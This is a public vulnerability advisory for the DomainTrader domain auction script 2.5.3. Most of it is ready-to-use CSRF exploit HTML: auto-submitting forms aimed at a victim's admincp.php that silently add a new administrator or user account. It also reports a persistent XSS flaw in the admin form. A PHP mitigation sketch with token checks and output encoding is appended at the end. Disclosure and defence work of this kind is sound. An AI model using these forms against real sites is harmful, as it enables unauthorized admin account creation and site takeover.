DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS

28 Aug 2014 | Reported by Haider Mahmood | Type: packetstorm | Source: packetstormsecurity.com

Vulnerabilities in DomainTrader Domain Parking / Auction Script 2.5.

Code
`# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities  
# Google Dork: Find yourself xD  
# Date: 26/8/2014  
# Exploit Author: Haider Mahmood | @HaiderMQ  
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/  
# Version: Tested on Latest Version 2.5.3  
  
Add new administrator CSRF:  
  
  
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>  
<script type="text/javascript">  
$(document).ready(function() {  
window.document.forms[0].submit();  
});  
</script>  
<form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php">  
<input type="hidden" name="mode" value="addadminuser" />  
<table width="400" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td>Username:</td>  
<td><input name="username" type="text" value="USERNAME" /></td>  
</tr>  
<tr>  
<td>Email Address:</td>  
<td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>  
</tr>  
<tr>  
<td>Password:</td>  
<td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>  
</tr>  
<tr>  
<td><input name="submit" type="submit" value="Add User" /></td>  
<td>&nbsp;</td>  
</tr>  
</table>  
</form>  
  
  
Add new user CSRF:  
  
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>  
<script type="text/javascript">  
$(document).ready(function() {  
window.document.forms[0].submit();  
});  
</script>  
<form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php">  
<input type="hidden" name="mode" value="addnewuser">  
<table width="500" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td><span>Username:</span></td>  
<td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>  
</tr>  
<tr>  
<td><span>Password:</span></td>  
<td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>  
</tr>  
<tr>  
<td><span>Confirm Password:</span></td>  
<td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>  
</tr>  
<tr>  
<td width="200"><span>First Name:</span></td>  
<td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>  
</tr>  
<tr>  
<td><span>Last Name:</span></td>  
<td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>  
</tr>  
<tr>  
<td><span>Email Address:</span></td>  
<td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>  
</tr>  
<tr>  
<td><span>Telephone:</span></td>  
<td><input type="text" name="telephone" id="telephone" value="010101010"></td>  
</tr>  
<tr>  
<td><span>Street Address:</span></td>  
<td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>City:</span></td>  
<td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>County/State:</span></td>  
<td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>Postcode/Zipcode:</span></td>  
<td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>  
</tr>  
<tr>  
<td><span>Country:</span></td>  
<td>  
<select name="country" id="country">  
<option value="AFGHANISTAN">AFGHANISTAN</option>  
<option value="ALBANIA">ALBANIA</option>  
<option value="ALGERIA">ALGERIA</option>  
<option value="AMERICAN SAMOA">AMERICAN SAMOA</option>  
<option value="ANDORRA">ANDORRA</option>  
<option value="ANGOLA">ANGOLA</option>  
<option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option>  
<option value="ARGENTINA">ARGENTINA</option>  
<option value="ARMENIA">ARMENIA</option>  
<option value="ARUBA">ARUBA</option>  
<option value="AUSTRALIA">AUSTRALIA</option>  
<option value="AUSTRIA">AUSTRIA</option>  
<option value="AZERBAIJAN">AZERBAIJAN</option>  
<option value="BAHAMAS">BAHAMAS</option>  
<option value="BAHRAIN">BAHRAIN</option>  
<option value="BANGLADESH">BANGLADESH</option>  
<option value="BARBADOS">BARBADOS</option>  
<option value="BELARUS">BELARUS</option>  
<option value="BELGIUM">BELGIUM</option>  
<option value="BELIZE">BELIZE</option>  
<option value="BENIN">BENIN</option>  
<option value="BERMUDA">BERMUDA</option>  
<option value="BHUTAN">BHUTAN</option>  
<option value="BOLIVIA">BOLIVIA</option>  
<option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option>  
<option value="BOTSWANA">BOTSWANA</option>  
<option value="BRAZIL">BRAZIL</option>  
<option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option>  
<option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>  
<option value="BULGARIA">BULGARIA</option>  
<option value="BURKINA FASO">BURKINA FASO</option>  
<option value="BURUNDI">BURUNDI</option>  
<option value="CAMBODIA">CAMBODIA</option>  
<option value="CAMEROON">CAMEROON</option>  
<option value="CANADA">CANADA</option>  
<option value="CAPE VERDE">CAPE VERDE</option>  
<option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>  
<option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option>  
<option value="CHAD">CHAD</option>  
<option value="CHILE">CHILE</option>  
<option value="CHINA">CHINA</option>  
<option value="COLOMBIA">COLOMBIA</option>  
<option value="COMOROS">COMOROS</option>  
<option value="CONGO">CONGO</option>  
<option value="COOK ISLANDS">COOK ISLANDS</option>  
<option value="COSTA RICA">COSTA RICA</option>  
<option value="COTE D'IVOIRE">COTE D'IVOIRE</option>  
<option value="CROATIA">CROATIA</option>  
<option value="CUBA">CUBA</option>  
<option value="CYPRUS">CYPRUS</option>  
<option value="CZECH REPUBLIC">CZECH REPUBLIC</option>  
<option value="DENMARK">DENMARK</option>  
<option value="DJIBOUTI">DJIBOUTI</option>  
<option value="DOMINICA">DOMINICA</option>  
<option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>  
<option value="ECUADOR">ECUADOR</option>  
<option value="EGYPT">EGYPT</option>  
<option value="EL SALVADOR">EL SALVADOR</option>  
<option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option>  
<option value="ERITREA">ERITREA</option>  
<option value="ESTONIA">ESTONIA</option>  
<option value="ETHIOPIA">ETHIOPIA</option>  
<option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>  
<option value="FAROE ISLANDS">FAROE ISLANDS</option>  
<option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>  
<option value="FIJI">FIJI</option>  
<option value="FINLAND">FINLAND</option>  
<option value="FRANCE">FRANCE</option>  
<option value="FRENCH GUIANA">FRENCH GUIANA</option>  
<option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>  
<option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option>  
<option value="GABON">GABON</option>  
<option value="GAMBIA">GAMBIA</option>  
<option value="GEORGIA">GEORGIA</option>  
<option value="GERMANY">GERMANY</option>  
<option value="GHANA">GHANA</option>  
<option value="GIBRALTAR">GIBRALTAR</option>  
<option value="GREECE">GREECE</option>  
<option value="GREENLAND">GREENLAND</option>  
<option value="GRENADA">GRENADA</option>  
<option value="GUADELOUPE">GUADELOUPE</option>  
<option value="GUAM">GUAM</option>  
<option value="GUATEMALA">GUATEMALA</option>  
<option value="GUINEA">GUINEA</option>  
<option value="GUINEA-BISSAU">GUINEA-BISSAU</option>  
<option value="GUYANA">GUYANA</option>  
<option value="HAITI">HAITI</option>  
<option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>  
<option value="HONDURAS">HONDURAS</option>  
<option value="HONG KONG">HONG KONG</option>  
<option value="HUNGARY">HUNGARY</option>  
<option value="ICELAND">ICELAND</option>  
<option value="INDIA">INDIA</option>  
<option value="INDONESIA">INDONESIA</option>  
<option value="IRAQ">IRAQ</option>  
<option value="IRELAND">IRELAND</option>  
<option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>  
<option value="ISRAEL">ISRAEL</option>  
<option value="ITALY">ITALY</option>  
<option value="JAMAICA">JAMAICA</option>  
<option value="JAPAN">JAPAN</option>  
<option value="JORDAN">JORDAN</option>  
<option value="KAZAKHSTAN">KAZAKHSTAN</option>  
<option value="KENYA">KENYA</option>  
<option value="KIRIBATI">KIRIBATI</option>  
<option value="KUWAIT">KUWAIT</option>  
<option value="KYRGYZSTAN">KYRGYZSTAN</option>  
<option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>  
<option value="LATVIA">LATVIA</option>  
<option value="LEBANON">LEBANON</option>  
<option value="LESOTHO">LESOTHO</option>  
<option value="LIBERIA">LIBERIA</option>  
<option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option>  
<option value="LIECHTENSTEIN">LIECHTENSTEIN</option>  
<option value="LITHUANIA">LITHUANIA</option>  
<option value="LUXEMBOURG">LUXEMBOURG</option>  
<option value="MACAO">MACAO</option>  
<option value="MADAGASCAR">MADAGASCAR</option>  
<option value="MALAWI">MALAWI</option>  
<option value="MALAYSIA">MALAYSIA</option>  
<option value="MALDIVES">MALDIVES</option>  
<option value="MALI">MALI</option>  
<option value="MALTA">MALTA</option>  
<option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option>  
<option value="MARTINIQUE">MARTINIQUE</option>  
<option value="MAURITANIA">MAURITANIA</option>  
<option value="MAURITIUS">MAURITIUS</option>  
<option value="MEXICO">MEXICO</option>  
<option value="MONACO">MONACO</option>  
<option value="MONGOLIA">MONGOLIA</option>  
<option value="MOROCCO">MOROCCO</option>  
<option value="MOZAMBIQUE">MOZAMBIQUE</option>  
<option value="MYANMAR">MYANMAR</option>  
<option value="NAMIBIA">NAMIBIA</option>  
<option value="NAURU">NAURU</option>  
<option value="NEPAL">NEPAL</option>  
<option value="NETHERLANDS">NETHERLANDS</option>  
<option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>  
<option value="NEW CALEDONIA">NEW CALEDONIA</option>  
<option value="NEW ZEALAND">NEW ZEALAND</option>  
<option value="NICARAGUA">NICARAGUA</option>  
<option value="NIGER">NIGER</option>  
<option value="NIGERIA">NIGERIA</option>  
<option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>  
<option value="NORWAY">NORWAY</option>  
<option value="OMAN">OMAN</option>  
<option value="PAKISTAN">PAKISTAN</option>  
<option value="PALAU">PALAU</option>  
<option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option>  
<option value="PANAMA">PANAMA</option>  
<option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option>  
<option value="PARAGUAY">PARAGUAY</option>  
<option value="PERU">PERU</option>  
<option value="PHILIPPINES">PHILIPPINES</option>  
<option value="POLAND">POLAND</option>  
<option value="PORTUGAL">PORTUGAL</option>  
<option value="PUERTO RICO">PUERTO RICO</option>  
<option value="QATAR">QATAR</option>  
<option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>  
<option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option>  
<option value="REUNION">REUNION</option>  
<option value="ROMANIA">ROMANIA</option>  
<option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option>  
<option value="RWANDA">RWANDA</option>  
<option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option>  
<option value="SAINT LUCIA">SAINT LUCIA</option>  
<option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option>  
<option value="SAMOA">SAMOA</option>  
<option value="SAN MARINO">SAN MARINO</option>  
<option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>  
<option value="SAUDI ARABIA">SAUDI ARABIA</option>  
<option value="SENEGAL">SENEGAL</option>  
<option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option>  
<option value="SEYCHELLES">SEYCHELLES</option>  
<option value="SIERRA LEONE">SIERRA LEONE</option>  
<option value="SINGAPORE">SINGAPORE</option>  
<option value="SLOVAKIA">SLOVAKIA</option>  
<option value="SLOVENIA">SLOVENIA</option>  
<option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option>  
<option value="SOMALIA">SOMALIA</option>  
<option value="SOUTH AFRICA">SOUTH AFRICA</option>  
<option value="SPAIN">SPAIN</option>  
<option value="SRI LANKA">SRI LANKA</option>  
<option value="SUDAN">SUDAN</option>  
<option value="SURINAME">SURINAME</option>  
<option value="SWAZILAND">SWAZILAND</option>  
<option value="SWEDEN">SWEDEN</option>  
<option value="SWITZERLAND">SWITZERLAND</option>  
<option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>  
<option value="TAIWAN">TAIWAN</option>  
<option value="TAJIKISTAN">TAJIKISTAN</option>  
<option value="THAILAND">THAILAND</option>  
<option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>  
<option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>  
<option value="TIMOR-LESTE">TIMOR-LESTE</option>  
<option value="TOGO">TOGO</option>  
<option value="TOKELAU">TOKELAU</option>  
<option value="TONGA">TONGA</option>  
<option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option>  
<option value="TUNISIA">TUNISIA</option>  
<option value="TURKEY">TURKEY</option>  
<option value="TURKMENISTAN">TURKMENISTAN</option>  
<option value="TUVALU">TUVALU</option>  
<option value="UGANDA">UGANDA</option>  
<option value="UKRAINE">UKRAINE</option>  
<option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>  
<option value="UNITED KINGDOM">UNITED KINGDOM</option>  
<option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>  
<option value="UNITED STATES">UNITED STATES</option>  
<option value="URUGUAY">URUGUAY</option>  
<option value="UZBEKISTAN">UZBEKISTAN</option>  
<option value="VANUATU">VANUATU</option>  
<option value="VENEZUELA">VENEZUELA</option>  
<option value="VIET NAM">VIET NAM</option>  
<option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>  
<option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>  
<option value="YEMEN">YEMEN</option>  
<option value="ZAMBIA">ZAMBIA</option>  
<option value="ZIMBABWE">ZIMBABWE</option>  
</select>  
</td>  
</tr>  
<tr>  
<td colspan="2"><input name="new_message_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new message.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_received_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new offer.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is accepted.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is cancelled</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1" /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1" /><span>Notify me by email when a domain is pushed.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1" /><span>Notify me by email when a domain sale is complete.</span></td>  
</tr>  
<tr>  
<td colspan="2"><input type="submit" name="Submit" value="Submit"></td>  
</tr>  
</table>  
</form>  
  
  
XSS:  
  
The values submitted through the Add new Administrator form are not properly sanitized, either when they are inserted into the database or when they are selected from it, causing persistent XSS.  
`
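
A mitigation sketch for the two issues above, as an added example that is not part of the original advisory or the vendor's code: a per-session synchronizer token checked before a state-changing `mode` is handled, and HTML-encoding of stored values on output. The function names and the `csrf_token` key are assumptions; only the `mode` values and the `username` field come from the forms above.

```php
<?php
// Added example: hypothetical hardening for an admin handler like admincp.php.
// Function names and the 'csrf_token' key are assumptions, not vendor code.

// Modes shown in the advisory; extend with every other state-changing mode.
const STATE_CHANGING_MODES = ['addadminuser', 'addnewuser'];

// Create (once per session) and return the synchronizer token.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True when the request may proceed: other modes pass, state-changing
// modes need a token that matches the session copy (constant-time compare).
function csrf_check(array $session, array $post): bool
{
    if (!in_array($post['mode'] ?? '', STATE_CHANGING_MODES, true)) {
        return true;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Encode a stored value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- Constructed demo data (runs on the CLI, no web server needed) ---
$session = [];
$token   = csrf_token($session);

// Cross-site auto-submitted form: the foreign page cannot read the token.
$forged = ['mode' => 'addadminuser', 'username' => 'USERNAME'];
// Same request sent from the real admin form, which embeds the token.
$legit  = $forged + ['csrf_token' => $token];

var_dump(csrf_check($session, $forged)); // rejected: no token supplied
var_dump(csrf_check($session, $legit));  // accepted: token matches session

// A stored value rendered back into the admin list is shown as text, not markup.
echo h('<b onmouseover="x">admin</b>'), PHP_EOL;
```

In a real handler `$session` would be `$_SESSION` after `session_start()` and `$post` would be `$_POST`, with the token emitted as a hidden field in each admin form. Encoding with `h()` belongs at every point where a stored username or email address is written into a page.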
